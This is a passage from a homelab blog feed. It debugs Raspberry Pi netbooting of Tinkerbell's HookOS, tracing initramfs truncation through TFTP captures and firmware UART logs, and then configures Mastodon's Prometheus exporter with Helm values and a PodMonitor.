</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cmdline</span>: <span style="color:#e6db74">&#34;464vn90e7rbj08xbwdjejmdf4it17c5zfzjyfhthbh19eij201hjgit021bmpdb9ctrc87x2ymc8e7icu4ffi15x1hah9iyaiz38ckyap8hwx2vt5rm44ixv4hau8iw718q5yd019um5dt2xpqqa2rjtdypzr5v1gun8un110hhwp8cex7pqrh2ivh0ynpm4zkkwc8wcn367zyethzy7q8hzudyeyzx3cgmxqbkh825gcak7kxzjbgjajwizryv7ec1xm2h0hh7pz29qmvtgfjj1vphpgq1zcbiiehv52wrjy9yq473d9t1rvryy6929nk435hfx55du3ih05kn5tju3vijreru1p6knc988d4gfdz28eragvryq5x8aibe5trxd0t6t7jwxkde34v6pj1khmp50k6qqj3nzgcfzabtgqkmeqhdedbvwf3byfdma4nkv3rcxugaj2d0ru30pa2fqadjqrtjnv8bu52xzxv7irbhyvygygxu1nt5z4fh9w1vwbdcmagep26d298zknykf2e88kumt59ab7nq79d8amnhhvbexgh48e8qc61vq2e9qkihzt1twk1ijfgw70nwizai15iqyted2dt9gfmf2gg7amzufre79hwqkddc1cd935ywacnkrnak6r7xzcz7zbmq3kt04u2hg1iuupid8rt4nyrju51e6uejb2ruu36g9aibmz3hnmvazptu8x5tyxk820g2cdpxjdij766bt2n3djur7v623a2v44juyfgz80ekgfb9hkibpxh3zgknw8a34t4jifhf116x15cei9hwch0fye3xyq0acuym8uhitu5evc4rag3ui0fny3qg4kju7zkfyy8hwh537urd5uixkzwu5bdvafz4jmv7imypj543xg5em8jk8cgk7c4504xdd5e4e71ihaumt6u5u2t1w7um92fepzae8p0vq93wdrd1756npu1pziiur1payc7kmdwyxg3hj5n4phxbc29x0tcddamjrwt260b0w&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">init</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#75715e"># this init container sha has support for volumes</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">linuxkit/init:872d2e1be745f1acb948762562cf31c367303a3b</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;${HOOK_CONTAINER_RUNC_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;${HOOK_CONTAINER_CONTAINERD_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">linuxkit/ca-certificates:v1.0.0</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">linuxkit/firmware:24402a25359c7bc290f7fc3cd23b6b5f0feb32a5</span> <span style="color:#75715e"># &#34;Some&#34; firmware from Linuxkit pkg; see https://github.com/linuxkit/linuxkit/blob/master/pkg/firmware/Dockerfile</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;${HOOK_CONTAINER_EMBEDDED_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">onboot</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">dhcpcd-once</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">linuxkit/dhcpcd:v1.0.0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: [ <span style="color:#e6db74">&#34;/etc/ip/dhcp.sh&#34;</span>, <span style="color:#e6db74">&#34;true&#34;</span> <span style="color:#f92672">] # 2nd paramter is one-shot true/false</span>: <span style="color:#66d9ef">true</span> <span style="color:#ae81ff">for onboot, false for services</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#capabilities.add:</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#  - CAP_SYS_TIME # for ntp one-shot no-max-offset after ntpd, for hardware missing RTC&#39;s that boot in 1970</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds.add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/lib/dhcpcd:/var/lib/dhcpcd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/run:/run</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/ip/dhcp.sh:/etc/ip/dhcp.sh</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dhcpcd.conf:/dhcpcd.conf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">runtime</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mkdir</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/lib/dhcpcd</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">udev</span> <span style="color:#75715e"># as a service; so system reacts to changes in devices</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;${HOOK_CONTAINER_UDEV_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: [ <span style="color:#e6db74">&#34;/lib/systemd/systemd-udevd&#34;</span>, <span style="color:#e6db74">&#34;--debug&#34;</span> ]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>: [ <span style="color:#ae81ff">all ]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds</span>: [ <span style="color:#ae81ff">/dev:/dev, /sys:/sys, /lib/modules:/lib/modules ]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">rootfsPropagation</span>: <span style="color:#ae81ff">shared</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">net</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">pid</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">b</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">c</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">getty</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">linuxkit/getty:v1.0.0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds.add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/profile.d/local.sh:/etc/profile.d/local.sh</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/securetty:/etc/securetty</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/motd:/etc/motd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/os-release:/etc/os-release</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/:/host_root</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/run:/run</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dev:/dev</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dev/console:/dev/console</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/usr/bin/nerdctl:/usr/bin/nerdctl</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">INSECURE=true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">b</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hook-docker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;${HOOK_CONTAINER_DOCKER_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">net</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">pid</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mounts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">cgroup2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">options</span>: [ <span style="color:#e6db74">&#34;rw&#34;</span>, <span style="color:#e6db74">&#34;nosuid&#34;</span>, <span style="color:#e6db74">&#34;noexec&#34;</span>, <span style="color:#e6db74">&#34;nodev&#34;</span>, <span style="color:#e6db74">&#34;relatime&#34;</span> ]
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">destination</span>: <span style="color:#ae81ff">/sys/fs/cgroup</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds.add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dev/console:/dev/console</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dev:/dev</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/resolv.conf:/etc/resolv.conf</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/lib/modules:/lib/modules</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/run/docker:/var/run</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/run/images:/var/lib/docker</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/run/worker:/worker</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/:/host_root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">runtime</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mkdir</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/run/images</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/run/docker</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/run/worker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">b</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">c</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hook-bootkit</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;${HOOK_CONTAINER_BOOTKIT_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">net</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mounts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">cgroup2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">options</span>: [ <span style="color:#e6db74">&#34;rw&#34;</span>, <span style="color:#e6db74">&#34;nosuid&#34;</span>, <span style="color:#e6db74">&#34;noexec&#34;</span>, <span style="color:#e6db74">&#34;nodev&#34;</span>, <span style="color:#e6db74">&#34;relatime&#34;</span> ]
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">destination</span>: <span style="color:#ae81ff">/sys/fs/cgroup</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/run/docker:/var/run</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">runtime</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mkdir</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/run/docker</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">dhcpcd-daemon</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">linuxkit/dhcpcd:v1.0.0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: [ <span style="color:#e6db74">&#34;/etc/ip/dhcp.sh&#34;</span>, <span style="color:#e6db74">&#34;false&#34;</span> <span style="color:#f92672">] # 2nd paramter is one-shot true/false</span>: <span style="color:#66d9ef">true</span> <span style="color:#ae81ff">for onboot, false for services</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#capabilities.add:</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#  - CAP_SYS_TIME # for ntp one-shot no-max-offset after ntpd, for hardware missing RTC&#39;s that boot in 1970</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds.add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/lib/dhcpcd:/var/lib/dhcpcd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/run:/run</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/ip/dhcp.sh:/etc/ip/dhcp.sh</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dhcpcd.conf:/dhcpcd.conf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">runtime</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mkdir</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/lib/dhcpcd</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">files</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">etc/os-release</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0444&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">contents</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      NAME=&#34;HookOS&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      VERSION=${HOOK_VERSION}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ID=hookos
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      VERSION_ID=${HOOK_VERSION}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      PRETTY_NAME=&#34;HookOS ${HOOK_KERNEL_ID} v${HOOK_VERSION}/k${HOOK_KERNEL_VERSION}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ANSI_COLOR=&#34;1;34&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      HOME_URL=&#34;https://github.com/tinkerbell/hook&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">etc/securetty</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">contents</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      console
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ttyUSB0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ttyUSB1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ttyUSB2</span>
</span></span></code></pre></div><p>The above is only supposed to serve as an example, so I removed a lot of lines
and comments. If you&rsquo;d like to have a look at the full file, have a look at the
<a href="https://github.com/tinkerbell/hook/blob/main/linuxkit-templates/hook.template.yaml">GitHub repo</a>.</p>
<p>My idea was to see whether I could get Getty to be put into the root of the
initramfs, instead of having it launched as a container. Looking at the Yaml file,
I decided I would just try to move it from the <code>services:</code> list to the <code>init:</code>
list, like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">init</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">linuxkit/getty:v1.0.0</span>
</span></span></code></pre></div><p>And that actually worked! The other issues were still there - the image was
still truncated, but now Getty was coming early enough in the image to be in
the non-truncated part. I was now getting a prompt when booting into the initramfs.</p>
<p>Looking around, I still couldn&rsquo;t fine any other obvious errors, just more
boot services which failed to start because their <code>config.json</code> files became
victims of the truncation. But I at least had another piece of proof that
truncation was happening, as I checked the total size of the unpacked initramfs
on my VM, and it was 603 MB. Checking the <code>/</code> size in the booted initramfs only
showed 404 MB total. Weirdly, part of that 404 MB was a 90 MB <code>initrd.img</code> file
in <code>/</code> which I couldn&rsquo;t make heads or tails of. The file definitely wasn&rsquo;t
from the actual initramfs, and I wasn&rsquo;t able to figure out where it came from
or what was in it from Google either.</p>
<p>Anyone got any idea what that <code>initrd.img</code> file suddenly appearing in my initramfs
might be?</p>
<p>At this point it was pretty clear that I&rsquo;m having a truncation problem. But googling
a bit, the next question was: Where?</p>
<h2 id="figuring-out-whos-truncating">Figuring out who&rsquo;s truncating</h2>
<p>Initial searches pointed me towards TFTP as the culprit. The <a href="https://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol">Wikipedia article</a>
has this to say:</p>
<blockquote>
<p>The original protocol has a transfer file size limit of 512 bytes/block x 65535 blocks = 32 MB. In 1998 this limit was extended to 65535 bytes/block x 65535 blocks = 4 GB by TFTP Blocksize Option RFC 2348. [&hellip;] If TFTP packets should be kept within the standard Ethernet MTU (1500), the blocksize value is calculated as 1500 minus headers of TFTP (4 bytes), UDP (8 bytes) and IP (20 bytes) = 1468 bytes/block, this gives a limit of 1468 bytes/block x 65535 blocks = 92 MB. Today most servers and clients support block number roll-over (block counter going back to 0 or 1[10] after 65535) which gives an essentially unlimited transfer file size.</p></blockquote>
<p>So it looked like, unless block number roll-over was implemented in the Pi
firmware, the maximum file size would be 92 MB. To try to verify that, I took
a tcpdump from the transfer of a 155 MB initramfs.
Here is the option acknowledgment packet:</p>
<p><figure>
    <img loading="lazy" src="read-req-ack.png"
         alt="A screenshot of a Wireshark packet output. It shows the TFTP content of the packet. The destination file is named as &#39;initramfs-armbian-bcm2711-legacy&#39;, the blksize option is 1468 and the tsize is 155222922 bytes."/> <figcaption>
            <p>Acknowledged options for the initramsfs transfer</p>
        </figcaption>
</figure>

So the blocksize is getting negotiated properly to the maximum size in my 1500 byte
MTU network, and the total size of 155 MB is also set correctly, it seems.</p>
<p>And here is the end of the transmission:
<figure>
    <img loading="lazy" src="read-finished.png"
         alt="A screenshot of a Wireshark packet output. It shows the end of the transfer, with a total of 105738 TFTP fragments and 155222922 bytes of data, exactly the same number as the tsize option from the start of the transmission. It also shows the actual block number as 40202."/> <figcaption>
            <p>Final data packet of the TFTP transfer for the initramfs</p>
        </figcaption>
</figure>

This output shows two things: First, exactly as many bytes were transferred as the
<code>tsize</code> option in the option acknowledgment at the start shows. In addition, a lot
more blocks (105738) were transferred than the max block number of 65535. The
actual block number of the last block was 40202, which indicates that the
previously mentioned block number roll-over was working as intended.</p>
<p>Overall, it did look like the entire file got transferred correctly.</p>
<p>So the next possibility was that there&rsquo;s something going wrong after the transfer.
For that, I had to have a look at the Pi&rsquo;s early boot process. First, I enabled
the <code>BOOT_UART=1</code> option. This option is in the Pi&rsquo;s firmware config stored in
EEPROM, so it needs to be set via the <code>rpi-eeprom-config</code> script from a running
Linux, it cannot be set via the <code>config.txt</code> file. Once I had that, I got the
first disappointment, as the output just stopped past this point:</p>
<pre tabindex="0"><code>TFTP_GET: aa:ce:d5:6e:90:cd 203.0.113.18 start4.elf

RX: 12 IP: 0 IPV4: 10 MAC: 10 UDP: 10 UDP RECV: 10 IP_CSUM_ERR: 0 UDP_CSUM_ERR: 0
TFTP: complete 2256224
RX: 14 IP: 0 IPV4: 12 MAC: 12 UDP: 12 UDP RECV: 12 IP_CSUM_ERR: 0 UDP_CSUM_ERR: 0
Read start4.elf bytes  2256224 hnd 0x0
[...]
Starting start4.elf @ 0xfec00200 partition -1
</code></pre><p>It only started up again when the kernel started booting. To get output from
the <code>start4.elf</code> execution, I had to add another option, <a href="https://www.raspberrypi.com/documentation/computers/config_txt.html#uart_2ndstage">uart_2ndstage</a>. This option can luckily be set in the <code>config.txt</code> file, so no further trip
into Linux was necessary.</p>
<p>That then finally delivered the answer to the question of where the
truncation happens with this message:</p>
<pre tabindex="0"><code>MESS:00:00:55.768976:0: initramfs loaded to 0x29440000 (size 0x5bbfa44)
</code></pre><p>The size given here is approximately 96 MB. So even though the file was larger,
and it looked like it was transferred in its entirety, the Pi&rsquo;s firmware only
loaded 96 MB into memory for the kernel to use. And that&rsquo;s where the truncation
was coming from.</p>
<h2 id="new-plan">New plan</h2>
<p>So I needed a new plan. I think the most reasonable next approach would be to
turn the boot process into a two-stage setup. The first stage is a small initramfs,
only containing the tools to download the second stage, which will be the full
initramfs, and then to pivot into that new image.</p>
<p>One problem is that I don&rsquo;t want to hardcode the address/name of the initramfs
image into the first stage initramfs. One possible option would be to add an
option to the kernel command line, as the kernel forwards all options it doesn&rsquo;t
know to the <code>init</code> binary it executes after startup.</p>
<p>This approach has the advantage that the overall HookOS process doesn&rsquo;t need to
be changed. The original initramfs can be left entirely untouched and never needs
to know that there was another boot stage for specific boards.</p>
<p>Testing that will be my next task. I wanted to get out this post first because
I felt that, with the description of the investigations I did and the explanation
of the solution to the problem, the blog post would end up in another one of my
tomes. And the &ldquo;posts, not tomes&rdquo; project is still in effect. &#x1f601;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Configuring Mastodon Prometheus Metrics</title>
      <link>https://blog.mei-home.net/posts/mastodon-prom-metrics/</link>
      <pubDate>Sat, 12 Jul 2025 22:50:45 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/mastodon-prom-metrics/</guid>
      <description>Gathering Mastodon sidekiq metrics with Prometheus</description>
      <content:encoded><![CDATA[<p>With release <a href="https://github.com/mastodon/mastodon/releases/tag/v4.4.0">4.4.0</a>
Mastodon introduced a Prometheus exporter. In this post, I will configure it
and show the data it provides.</p>
<p>With the new release, Mastodon provides metrics from Ruby and Sidekiq. I&rsquo;ve
attached examples for both to this post, see <a href="ruby.txt">here for Ruby</a> and
<a href="sidekiq.txt">here for Sidekiq</a>.</p>
<p>The information is not actually that interesting, it&rsquo;s just generic process
data. But I did find at least the Sidekiq data worth gathering. It will provide
an interesting future look into my usage of Mastodon and perhaps even the
activity in the Fediverse (or at least the part I&rsquo;m connected to) overall.</p>
<p>I&rsquo;m running Mastodon via the <a href="https://github.com/mastodon/chart">official Helm chart</a>,
so I enabled the metrics exporters via the <code>values.yaml</code> file like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mastodon</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">statsd</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exporter</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">sidekiq</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">detailed</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>As I&rsquo;ve noted above, I didn&rsquo;t find the Ruby data interesting at all, so I did
not enable the detailed data for that.</p>
<p>Enabling the Prometheus exporter adds containers running the exporter to the
Sidekiq and Web Pods. Both listen on port <code>9394</code> by default. These ports are not
added to any Services.</p>
<p>To instruct my Prometheus instance to scrape the endpoints, I created a
<a href="https://prometheus-operator.dev/docs/api-reference/api/#monitoring.coreos.com/v1.PodMonitor">PodMonitor</a>
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PodMonitor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">sidekiq-metrics</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/component</span>: <span style="color:#ae81ff">sidekiq-all-queues</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/instance</span>: <span style="color:#ae81ff">mastodon</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">mastodon</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">mastodon</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podMetricsEndpoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">port</span>: <span style="color:#ae81ff">prometheus</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/metrics</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">1m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">collector_.*</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">heap_.*</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">rss</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">malloc_increase_bytes_limit</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">oldmalloc_increase_bytes_limit</span>
